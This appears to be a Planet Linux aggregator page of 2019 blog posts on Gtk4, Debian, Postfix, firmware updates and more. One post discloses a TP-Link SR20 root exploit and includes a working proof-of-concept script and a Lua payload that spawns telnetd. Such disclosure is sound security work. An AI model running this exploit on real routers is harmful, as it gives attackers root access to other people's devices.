Full Circle Magazine: Full Circle Magazine #143

Planet Ubuntu - Fri, 29/03/2019 - 8:30pm

This month:
* Command & Conquer
* How-To : Python, Freeplane, and Darktable
* Graphics : Inkscape
* Ubuntu Devices: OTA-8
* My Opinion: GDPR Pt3
* Linux Loopback: BSD
* Book Review: Practical Binary Analysis
* Interview: Simon Quigley (Lubuntu)
* Ubuntu Games: This Is The Police 2
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot: https://fullcirclemagazine.org/issue-143/

Alexander Larsson: Broadway adventures in Gtk4

Planet GNOME - Fri, 29/03/2019 - 4:20pm

One of my long running side projects is a Gtk backend called “Broadway”. Instead of rendering to the screen, this backend creates an HTTP server that you can connect to, and then exposes the UI remotely in the browser.

The original version of Broadway essentially streamed image frames, although there were various ways to optimize what got sent. This matches pretty well with how Gtk 3 rendering works, particularly on Wayland. Every frame Gtk calls out to all widgets, letting them draw on top of a buffer, and then sends the final frame to the compositor. Broadway just inserts some image delta computation and JavaScript magic in the middle of this.
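To make the old model concrete, here is a minimal, hypothetical sketch (plain Python over bare pixel arrays; the real implementation lives in Gtk's C code and is considerably smarter) of that kind of image delta computation, where only the tiles that changed since the previous frame would need to be re-sent:

# Hypothetical sketch of per-frame image deltas: find the tiles whose
# pixels differ between the previous and the current frame.
def changed_tiles(prev, cur, width, height, tile=32):
    """Yield (x, y) origins of tiles that differ between two frames."""
    for y in range(0, height, tile):
        for x in range(0, width, tile):
            if any(prev[j][i] != cur[j][i]
                   for j in range(y, min(y + tile, height))
                   for i in range(x, min(x + tile, width))):
                yield (x, y)

prev = [[0] * 8 for _ in range(8)]
cur = [row[:] for row in prev]
cur[5][6] = 1  # a single changed pixel dirties exactly one tile
print(list(changed_tiles(prev, cur, 8, 8, tile=4)))  # -> [(4, 4)]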

Enter Gtk 4, breaking everything!

However, time moves on, and the current development branch of Gtk (which will be Gtk 4) has completely changed how rendering works, with the goal of doing efficient rendering on modern GPUs.

In the new model widgets don’t directly render to a buffer. Instead they build up a model of how the final result should look in terms of something called render nodes. These describe rendering as a tree of high-level operations. The backend (we have software, OpenGL and Vulkan backends) then knows how to take this description and submit it to the GPU in an efficient way. This is somewhat similar to Firefox’s WebRender project.

It would be possible to implement the broadway backend by hooking up the software renderer, letting it generate a buffer and then sending that to the browser. However, that is pretty lame!

CSS comes to the rescue!

Instead I’ve been looking at making the browser actually draw the render nodes. Gtk defines a lot of its UI in terms of CSS these days, and that means that the render nodes actually are very close to the CSS rendering model. For example, the basic drawing operations are things like rounded boxes with borders, shadows, etc.

So, I was thinking: could we not take these render nodes and turn them into actual DOM nodes with CSS styles and send them to the browser? Then every frame we can just diff the DOM trees, sending the minimal changes necessary.

Sounds crazy right? But, it turns out to work pretty well.
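As a rough illustration of the idea (a sketch only: the node structure below is invented for this example, and the real mapping lives inside the Gtk broadway backend), a single “rounded box” render node could translate to a DOM node with inline CSS along these lines:

# Illustrative Python sketch: map a made-up render-node structure to
# a DOM element with inline CSS. Not Broadway's actual code.
def render_node_to_html(node):
    if node["type"] == "rounded-box":
        style = (
            f"position:absolute;"
            f"left:{node['x']}px;top:{node['y']}px;"
            f"width:{node['w']}px;height:{node['h']}px;"
            f"border-radius:{node['radius']}px;"
            f"border:{node['border']};"
            f"box-shadow:{node['shadow']};"
            f"background:{node['background']};"
        )
        children = "".join(render_node_to_html(c) for c in node.get("children", []))
        return f'<div style="{style}">{children}</div>'
    raise ValueError("unhandled node type")

print(render_node_to_html({
    "type": "rounded-box", "x": 10, "y": 10, "w": 200, "h": 48,
    "radius": 6, "border": "1px solid #b6b6b3",
    "shadow": "0 1px 2px rgba(0,0,0,0.3)",
    "background": "linear-gradient(#f6f5f4,#e8e6e3)",
}))

Frame-to-frame updates then reduce to diffing two such trees, so only the changed nodes need to cross the wire.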

Check out this example page which I created with the magic of “save as”. In particular, try zooming into that page in the browser, and play with the developer tools inspector to see the nodes. Here is a part of it zoomed in:

The icons and the text are not CSS, so they don’t scale, but look at those gorgeous borders, shadows and gradients!

Entering the 3rd dimension!

Particularly interesting is the support in Gtk for general 3D transforms. This maps well to CSS transforms on the browser side.

Check out this example of a spinning-cube transition. If you open up the browser inspector you can see that each individual element in the cube is still a regular CSS box.

Some technical notes

If you look at the examples above they all use data: uris for images. This is a custom mode that lets “screenshots” like the above work. Normally broadway uses blobs for the images.

Also, looking at the examples, they seem very heavy in terms of images, as all the text is sent as images. However, in a typical frame most of the render tree is identical to the previous frame, meaning any label that was used in the last frame need not be sent again. In fact, even if it changes position in the tree due to a parent node changing (scrolling, cube-switching, etc.) it can still be reused as-is.

However, text is clearly the weak point here. Unfortunately HTML/CSS has no low-level text rendering APIs we could use. I’m considering generating a texture atlas with pre-rendered glyphs that can be reused (like CSS sprites) when rendering text; that would at least mean less data to download. If anyone has other ideas I would love to hear them.

Martin Michlmayr: FOSSASIA 2019 in Singapore

Planet Debian - Fri, 29/03/2019 - 8:42am

I attended FOSSASIA earlier this month. This conference has been on my radar for many years but I never managed to attend before.

I was impressed by the organization of the conference. Furthermore, I liked that the audience was completely different from the conferences I normally attend. There were so many new people. FOSSASIA has grown to be not just a conference, but also an umbrella organization for several open source projects.

I gave a talk about open source culture, using Debian as an example. I find this type of presentation important because this is where a lot of pitfalls are for many new contributors. Learning technologies is easy, but figuring out all the unwritten norms and rules of a community can be daunting. Of course, it was particularly interesting to give this talk in an environment where I'm the cultural outsider. While I've visited a number of Asian countries, there's a lot about the different cultures I have yet to learn.

I met a number of Debian contributors, including Andrew Lee, Norbert Preining (who talked about TeX Live), Graham Williams (who used to contribute to Debian in the early days and heads an AI team at Microsoft in Singapore now), Kai Hendry (who used to contribute to Debian) and others. I also spent some time away from the conference to write my DPL platform.

Thank you to Hong Phuc Dang, Mario Behling and all the other organizers and volunteers for a wonderful event!

Kurt von Finck: Last post. I’m gone.

Planet Ubuntu - Fri, 29/03/2019 - 3:57am

Last post. I’m gone.

https://reddit.com/r/ploos

https://pluspora.com

I’m “mneptok” just about everywhere. I’ll see you all in the next life, when we are all cats.

https://youtu.be/FqHIkkRrwcQ

Ubuntu Studio: Ubuntu Studio 19.04 (Disco Dingo) Beta Released

Planet Ubuntu - Fri, 29/03/2019 - 3:19am
The Ubuntu Studio team is pleased to announce the beta release of Ubuntu Studio 19.04, codenamed Disco Dingo. While this beta is reasonably free of any showstopper CD build or installer bugs, you may find some bugs within. This image is, however, reasonably representative of what you will find when Ubuntu Studio 19.04 is released […]

Georges Basile Stavracas Neto: On Being a Free Software Maintainer

Planet GNOME - Fri, 29/03/2019 - 3:08am

Year is 2013. I learn about a new, alpha-quality project called “GNOME Calendar.” Intriguing.

I like calendars.

“Cool, I’ll track that,” said my younger self. Heavy development was happening at the ui-rework branch. Every day, a few new commits. Pull, build, test. Except one day, no new commits. Nor the next day. Or week. Or month. Or year. I’m disappointed. Didn’t want that project to die. You know…

I like calendars.

“Nope. Not gonna happen,” also said my younger self. Clone, build, fix bugs, send patches. Maintainer’s interest in the project is renewed. We get a new icon, things get serious. We go to a new IRC room (!) and make the first public release of GNOME Calendar.

One year passes, it is now 2015. After contributing for more than a year, Erick made me the de facto GNOME Calendar maintainer ¹. A mix of positive emotions flows: pride in the achievement; excitement at being able to carry on with my ideas for the future of the application; fear, for the weight of the responsibility.

But heck, I am a free software maintainer now.

That was 4 years ago. Time passes, things happen, experience is built. Experience that differs from what I originally expected.

Being a free software maintainer is a funny place to find yourself in. Good things came from it. Bad things too. Also terrible. And weird.

Naturally, there is a strong sense of achievement when you, well, achieve maintainership of a project. Usually, getting there requires a large number of interactions during a long period of time. It means you are trusted. It means you are trustworthy. It means you are skilled enough.

It also usually means stronger community bonds. Getting to know excellent people, that know a lot and are willing to share and mentor and help, is a life-changing experience. There is a huge human value in being surrounded by great people.

For those of us who enjoy coding, hooray! Full plate. Planning releases, coding and doing reviews can be fun too. You will fix problems, find solutions, think and design your code. There is a plethora of problems to fix in this plane of existence, and you have the chance to independently fix a few of them by yourself.

And people. There are good people on this planet. You will eventually receive a thank-you email, or someone will buy you a coffee. One way or another, people find their way to you.

People really do find their way to you.

See, sometimes the software you maintain, well, it crashes. It may lose someone’s data. Someone may trigger a unique condition inside the code that you never managed to hit yourself. These people may get angry, sad, and frustrated ².

And they will find their way to you.

You will be demanded to fix your software. You will be shouted at. Sometimes, the line may be crossed, and you will be abused. “How dare you not (use your free time to) fix this ultra high priority bug that is affecting me?” or “This is an absolutely basic feature! How is it not implemented yet (by you on your free time)?!” or even “You made me move to Software Y, and you need to win me back” are going to be realities you will have to face.

You may get emotional about your code. You may feel ashamed of what you did, and do. After all, your code has bugs, there are numerous issues opened at your bug tracker, and people are complaining non-stop. (Oh and, naturally, there will be someone who will try their best to put you down with that.)

At one point, you will look at your issue backlog and feel a subtle despair when you realise you won’t ever be able to fix all the bugs.

If you are open to reviewing other people’s contributions, there is a high chance you will find challengers disguised as contributors. And your code review will be treated as an intellectual battle between good and evil. And you will need to explain and clarify over and over, and deal with circular logic, and pretty much any tool people might use to win battles instead of improving their code. And that is incredibly tiresome.

You will be told that you need to develop a thick skin. To ignore that, let it go, think positive and don’t pay attention to all the shit that is being thrown at you and why are you so goddamn negative you’re a maintainer for christ sake.

You may no longer feel the joy of working on what you work on. You may want to move on. You may also not do that, due to the sense of responsibility that you have to your code, your community, and the people who use your software.

Unfortunately, being a free software maintainer may exact a high price on your psychological and emotional health.

Four years ago, I certainly did not know that.

¹ – And by “maintainer”, I am talking about being an upstream code maintainer, not package maintainer.
² – Rightfully so. Nobody wants to lose their stuff, or have their workflow broken.

Dirk Eddelbuettel: drat 0.1.5: New release

Planet Debian - Fri, 29/03/2019 - 2:34am

A new version of drat just arrived on CRAN. And like the last time in December 2017 it went through as an automatically processed upgrade directly from the CRAN prechecks. Being a simple package can have its upsides…

And like the last time, this release once again draws largely upon contributed pull requests. Neal Fultz cleaned up how Windows paths are handled when inserting Windows (binary) packages. And Christoph Stepper extended the support for binary packages to the helper commands pruneRepo and archivePackages. I added a minor cleanup to a test Neal added in the previous version, and that made for a quick and simple release!

drat stands for drat R Archive Template, and helps with easy-to-create and easy-to-use repositories for R packages. Since its inception in early 2015 it has found reasonably widespread adoption among R users because repositories with marked releases are the better way to distribute code.

As your mother told you: Friends don’t let friends install random git commit snapshots. Rolled-up release it is. And despite what some (who may not know it well) say, drat is actually rather easy to use, documented by five vignettes and just works.
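As a hedged illustration of typical use (the repository path is hypothetical, and the exact argument names are best checked against the vignettes), a drat workflow from R looks roughly like this:

## Minimal sketch, assuming a local drat repository at "~/git/drat".
## insertPackage() adds a built package; pruneRepo() and archivePackages()
## are the helpers extended in this release. Argument names here are
## illustrative; consult the drat vignettes for the authoritative interface.
library(drat)
insertPackage("myPkg_0.1.0.tar.gz", repodir = "~/git/drat")   # add a release
pruneRepo(repopath = "~/git/drat", pkg = "myPkg")             # trim old versions
archivePackages(repopath = "~/git/drat", pkg = "myPkg")       # move them aside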

The NEWS file summarises the release as follows:

Changes in drat version 0.1.5 (2019-03-28)
  • Changes in drat functionality

    • Windows paths are handled better when inserting packages (Neal Fultz in #70)

    • Binary packages are now supported for the pruneRepo and archivePackages commands (Christoph Stepper in #79).

  • Changes in drat documentation

    • Properly prefix R path in system call in a test (Dirk in minor cleanup to #70).

Courtesy of CRANberries, there is a comparison to the previous release. More detailed information is on the drat page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

Planet GNOME - Thu, 28/03/2019 - 11:20pm
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64];
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    } else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      } else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}

Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address), which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:

#!/usr/bin/python3
# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
#
# Create a file in your tftp directory with the following contents:
#
# function config_test(config)
#   os.execute("telnetd -l /bin/login.sh")
# end
#
# Execute script as poc.py remoteaddr filename

import binascii
import socket
import sys

port_send = 1040
port_receive = 61000

tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00

tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])

sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))

# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()

response, addr = sock_receive.recvfrom(1024)
r = response.hex()
print(r)
[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

Jonathan Carter: Fun and Debian

Planet Debian - Thu, 28/03/2019 - 6:57pm

Brief background

When I started working on my DPL platform, I read through some platforms of recent years. Many of them made some mention of either making Debian a more fun project to contribute to, or keeping it so, even to the point where it has been considered a cliché. Recently, Lucas Nussbaum (DPL between 2013 and 2015), posted a list of DPL roles as he sees it, listing “Keep Debian fun and functional” as responsibility #0, so we know that it’s generally expected from the DPL to help make Debian a good project to be part of and contribute to.

In Marga’s platform that I linked above, she delves into what exactly “more fun” would mean. Oddly enough, few platforms which mention ‘making Debian fun’ as a goal actually do that, which is also why I chose to be more specific in my platform about changes that I’d like to promote, instead of just using a blanket term such as “make Debian more fun”.

Keeping employees engaged

The image below has been making the rounds on the Internet for a long time. I couldn’t find its original source, but I think it’s still a great high-level summary of things that a company should keep in mind to keep their employees engaged and maintain a good relationship.

If you’re having trouble reading that, it says:

Employees stay engaged when they are:

  • Paid well
  • Mentored
  • Challenged
  • Promoted
  • Involved
  • Appreciated
  • Valued
  • On a Mission
  • Empowered
  • Trusted

Plenty of other platforms touched on some of these over the years. So I wondered… what would an ideal “Debian contributors stay when…” infographic look like?

Keeping and making fun in Debian

What’s great about the average Debian contributor is that they already want to be part of Debian. We don’t have to spend as much time as a commercial company does to incentivise a person to be part of the project. So I think in many ways, keeping Debian fun mostly involves removing bad obstacles/blockers and allowing a contributor to do their work with the least amount of friction. Having said that, I also believe that there is scope for making fun, that is, actively doing things that are enjoyable and that may attract more contributors.

Originally, I was going to write a loooooooooooooong piece on this and then make a graphic based on it. Around an hour into it, about halfway done, I realised it was just going to be way too long and abandoned it in favour of going straight to the graphic.

So here goes, I call it version 0.0 of a Debian Fun Statement.

If you read DPL platforms this year and previous years, you’ll certainly recognise some elements from it. It reads:

In Debian, we’re having fun when:

  • we’re doing valuable work
  • we’re proud to be associated with the project
  • we’re feeling safe
  • we have opportunities to learn and grow
  • we figure out how to work out our differences
  • we work together on solutions
  • we’re efficient at making decisions
  • we’re getting things done
  • we’re sharing our knowledge with others
  • we feel appreciated
  • we feel understood
  • we feel included

I referred to it as a Debian Fun Statement and not the Debian Fun Statement, because I hastily put it together myself; it’s not official in any way at all. I think it might be worthwhile for us as a community to put together some nice final wording, and for someone with graphic skills to do some nice layout/artwork.

As part of my campaign running for DPL, I want to let Debianites know that I plan to make all of the above count for every Debian contributor. I tried to encode that as much as possible into my platform, and hope that it comes across that way when you read it. Feedback is always welcome, thanks for reading!

Thomas Lange: New FAI version and ISO images

Planet Debian - Thu, 28/03/2019 - 5:42pm

The new FAI version is available in two variants. FAI 5.8.4 is for Debian buster, and FAI 5.8.4~bpo9+2 is the same for the stable distribution called stretch, including the configs for stretch.

You can get the packages when adding one of these lines to your sources.list:

deb https://fai-project.org/download stretch koeln

or

deb https://fai-project.org/download buster koeln

New FAI ISO images using stretch are now available from [1]. The FAIme build service [2] for customized cloud and installation images also uses the newest FAI versions.

[1] https://fai-project.org/fai-cd/

[2] https://fai-project.org/FAIme

Richard Hughes: New AppStream Validation Requirements

Planet GNOME - Thu, 28/03/2019 - 5:36pm

In the next release of appstream-glib the appstream-util validate requirements got changed, which might make your life easier, or harder — depending on whether you already pass or fail the validation. The details are here but the rough gist is that we’ve relaxed a lot of the style rules (e.g. starts with a capital letter, ends with a full stop, less than a certain number of chars, etc), and made stricter some of the more important optional parts of the specification. For instance, requiring <content_rating> for any desktop or console application.
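For instance, a minimal sketch of what such a tag looks like in an AppStream metainfo file (the component id and OARS version here are illustrative, not prescriptive):

<!-- Illustrative snippet only; a real metainfo file carries many more tags. -->
<component type="desktop-application">
  <id>org.example.App</id>
  <!-- the tag the stricter validation now expects for desktop/console apps -->
  <content_rating type="oars-1.1"/>
</component>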

Even if you don’t care upstream, the new validation will soon be turned on for any apps built in Flathub, and downstream “packagers” will be pestering you for details as updates are now failing. Although only a few apps fail, some of the missing metadata tags are important enough to fail building. To test your app right now with the new validator:

$ flatpak remote-add --if-not-exists gnome-nightly https://sdk.gnome.org/gnome-nightly.flatpakrepo
$ flatpak install gnome-nightly org.gnome.Sdk
$ flatpak run --command=bash --filesystem=home:ro org.gnome.Sdk//master
# appstream-util validate /home/hughsie/Code/gnome-software/data/appdata/org.gnome.Software.appdata.xml.in
# exit

Of course, when the next tarball is released it’ll be available in your distribution as normal, but I wanted to get some early sanity checks in before I tag the release.

Christian Schaller: LVFS adopted by Linux Foundation

Planet GNOME - Thu, 28/03/2019 - 3:50pm

Today the announcement went out that the Linux Vendor Firmware Service has become an official Linux Foundation service. For those that don’t know it yet, LVFS is a service that provides firmware for your Linux-running hardware, and it was one of our initial efforts, as part of the Fedora Workstation effort, to drain the swamp in terms of making Linux a first class desktop operating system.

The effort came about due to Peter Jones, who is Red Hat’s representative to the UEFI standards body, approaching me to talk about how Microsoft was pushing for a standardized way to ship UEFI firmware for Windows, and how UEFI being a standard opened a path for us to actually get full support for this without each vendor having to ship and maintain their own proprietary firmware tools. So we did a meeting with Peter Jones and also brought in Richard Hughes, who had already been looking at the problem of firmware updates in Linux, partly due to his ColorHug hardware, and the effort got started with Peter working on the low-level OS tooling and Richard taking on building the service to drive distribution and the work to integrate it all into GNOME Software. One concern we had, of course, was whether we could reach critical mass for this and get vendors interested, but luckily Dell was just as keen on improving firmware handling under Linux as us and signed on from the start. Having Dell on board helped give the effort a lot of credibility, and as the service matured we ended up having more and more vendors sign up. We also reached out through Red Hat’s partnerships to push vendors to adopt supporting it. As Richard also mentions in his interview about it, we had made the solution as similar to Microsoft’s as possible to decrease the threshold for hardware vendors to join, the goal being that if they did the basic work to support Windows they could more or less just ship the same firmware file to LVFS.

One issue that we had gone back and forth about inside Red Hat was the formal setup of the service. While we all agreed the service was hugely beneficial, it felt like something that should be a shared service for all of Linux, and we felt that if the service was Red Hat provided it might dissuade other vendors from joining. So we started looking around for a neutral place to land the service, while in the meantime LVFS had a sort of autonomous status, being run as a community effort by Richard Hughes. We ended up talking to Chris Wright, the Red Hat CTO, about the project and he offered to facilitate contact with the Linux Foundation. The initial meetings were very positive and the Linux Foundation seemed interested in running the service right from the start. It did end up taking us quite some time to clear all formal and technical hurdles to get there, but I for one am very happy to see the LVFS now being a vendor-neutral service provided by the Linux Foundation.

So a big thank you to Richard Hughes, Peter Jones, Chris Wright, Mario Limonciello and Dell, and the Linux Foundation for their help in getting us here. And also a big thank you to Fedora and the Fedora community for their help with providing us a place to develop and polish up this service to the benefit of all. To me this is one of many examples of how Fedora keeps innovating and leading the way on desktop Linux.

Ismael Olea: Postfix: Name service error for name=domain.com type=MX: Host not found, try again

Planet GNOME - Thu, 28/03/2019 - 3:26pm

I tried to post this in Serverfault but I couldn’t since it’s blocked by their spam detector.

Here is the full text of my question:

Hi:

I’m stuck with a Postfix MX related problem.

I’ve just migrated a very old Centos 5 server to v7 so I’m using postfix-2.10.1-7.el7.x86_64. I’ve upgraded the legacy postfix configuration (maybe the cause of this hell) and other supplementary stuff which seems to work:

  • postfix-perl-scripts-2.10.1-7.el7.x86_64
  • postgrey-1.34-12.el7.noarch
  • amavisd-new-2.11.1-1.el7.noarch
  • spamassassin-3.4.0-4.el7_5.x86_64
  • perl-Mail-SPF-2.8.0-4.el7.noarch
  • perl-Mail-DKIM-0.39-8.el7.noarch
  • dovecot-2.2.36-3.el7.x86_64

After many tribulations I think I got most of the system running, except for the annoying MX related problems, such as these (from /var/log/maillog):

Mar 28 14:26:48 tormento postfix/smtpd[1021]: warning: Unable to look up MX host for spmailtechn.com: Host not found, try again
Mar 28 14:26:51 tormento postfix/smtpd[1052]: warning: Unable to look up MX host for inlumine.ual.es: Host not found, try again
Mar 28 14:31:38 tormento postfix/smtpd[1442]: warning: Unable to look up MX host for aol.com: Host not found, try again
Mar 28 13:07:53 tormento postfix/smtpd[26556]: warning: Unable to look up MX host for hotmail.com: Host not found, try again
Mar 28 13:12:06 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for facebookmail.com: Host not found, try again
Mar 28 13:12:31 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for joker.com: Host not found, try again
Mar 28 13:13:02 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for bounce.linkedin.com: Host not found, try again

and:

Mar 28 14:50:36 tormento postfix/smtp[1700]: 7B6C69C6A2: to=<ismael.olea@gmail.com>, orig_to=<ismael@olea.org>, relay=none, delay=1142, delays=1142/0.07/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=gmail.com type=MX: Host not found, try again)
Mar 28 14:32:05 tormento postfix/smtp[1383]: 721A19C688: to=<XXXXX@yahoo.com>, orig_to=<XXXX@olea.org>, relay=none, delay=4742, delays=4742/0/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=yahoo.com type=MX: Host not found, try again)

as examples.

The first suspect is DNS resolution, but this is working, both using the Hetzner DNS servers (where the machine is hosted) and 8.8.8.8 or 9.9.9.9:

$ dig mx gmail.com

; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx gmail.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20330
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;gmail.com.			IN	MX

;; ANSWER SECTION:
gmail.com.		3014	IN	MX	10 alt1.gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	5 gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	40 alt4.gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	20 alt2.gmail-smtp-in.l.google.com.
gmail.com.		3014	IN	MX	30 alt3.gmail-smtp-in.l.google.com.

;; Query time: 1 msec
;; SERVER: 213.133.100.100#53(213.133.100.100)
;; WHEN: jue mar 28 14:56:00 CET 2019
;; MSG SIZE  rcvd: 161

or:

$ dig mx inlumine.ual.es

; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx inlumine.ual.es
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38239
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 2, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;inlumine.ual.es.		IN	MX

;; ANSWER SECTION:
inlumine.ual.es.	172800	IN	MX	1 ASPMX.L.GOOGLE.COM.
inlumine.ual.es.	172800	IN	MX	10 ASPMX3.GOOGLEMAIL.COM.
inlumine.ual.es.	172800	IN	MX	10 ASPMX2.GOOGLEMAIL.COM.
inlumine.ual.es.	172800	IN	MX	5 ALT1.ASPMX.L.GOOGLE.COM.
inlumine.ual.es.	172800	IN	MX	5 ALT2.ASPMX.L.GOOGLE.COM.

;; AUTHORITY SECTION:
inlumine.ual.es.	172800	IN	NS	dns.ual.es.
inlumine.ual.es.	172800	IN	NS	alboran.ual.es.

;; Query time: 113 msec
;; SERVER: 213.133.100.100#53(213.133.100.100)
;; WHEN: jue mar 28 14:56:51 CET 2019
;; MSG SIZE  rcvd: 217

my main.cf:

$ postconf -n
address_verify_sender = postmaster@olea.org
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
body_checks = regexp:/etc/postfix/body_checks.regexp
broken_sasl_auth_clients = yes
canonical_maps = hash:/etc/postfix/canonical
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
data_directory = /var/lib/postfix
debug_peer_level = 2
debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5
header_checks = pcre:/etc/postfix/header_checks.pcre
home_mailbox = Maildir/
html_directory = no
inet_interfaces = all
inet_protocols = ipv4
local_recipient_maps = proxy:unix:passwd.byname $alias_maps
mail_owner = postfix
mailbox_command = /usr/bin/procmail -a "$EXTENSION"
mailbox_size_limit = 200000000
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
message_size_limit = 30000000
mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain, tormento.olea.org, /etc/postfix/localdomains
myhostname = tormento.olea.org
newaliases_path = /usr/bin/newaliases.postfix
policy_time_limit = 3600
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.10.1/README_FILES
recipient_delimiter = +
sample_directory = /usr/share/doc/postfix-2.10.1/samples
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtp_tls_cert_file = /etc/pki/tls/certs/tormento.olea.org.crt.pem
smtp_tls_key_file = /etc/pki/tls/private/tormento.olea.org.key.pem
smtp_tls_mandatory_protocols = !SSLv2,!SSLv3
smtp_tls_note_starttls_offer = yes
smtp_tls_security_level = may
smtpd_helo_required = yes
smtpd_recipient_restrictions = permit_mynetworks check_client_access hash:/etc/postfix/access permit_sasl_authenticated reject_non_fqdn_recipient reject_non_fqdn_sender reject_rbl_client cbl.abuseat.org reject_rbl_client dnsbl-1.uceprotect.net reject_rbl_client zen.spamhaus.org reject_unauth_destination check_recipient_access hash:/etc/postfix/roleaccount_exceptions reject_multi_recipient_bounce check_helo_access pcre:/etc/postfix/helo_checks.pcre reject_non_fqdn_hostname reject_invalid_hostname check_sender_mx_access cidr:/etc/postfix/bogus_mx.cidr check_sender_access hash:/etc/postfix/rhsbl_sender_exceptions check_policy_service unix:postgrey/socket permit
smtpd_sasl_auth_enable = yes
smtpd_sasl_local_domain = $myhostname, olea.org, cacharreo.club
smtpd_sasl_path = private/auth
smtpd_sasl_security_options = noanonymous
smtpd_sasl_type = dovecot
smtpd_tls_auth_only = no
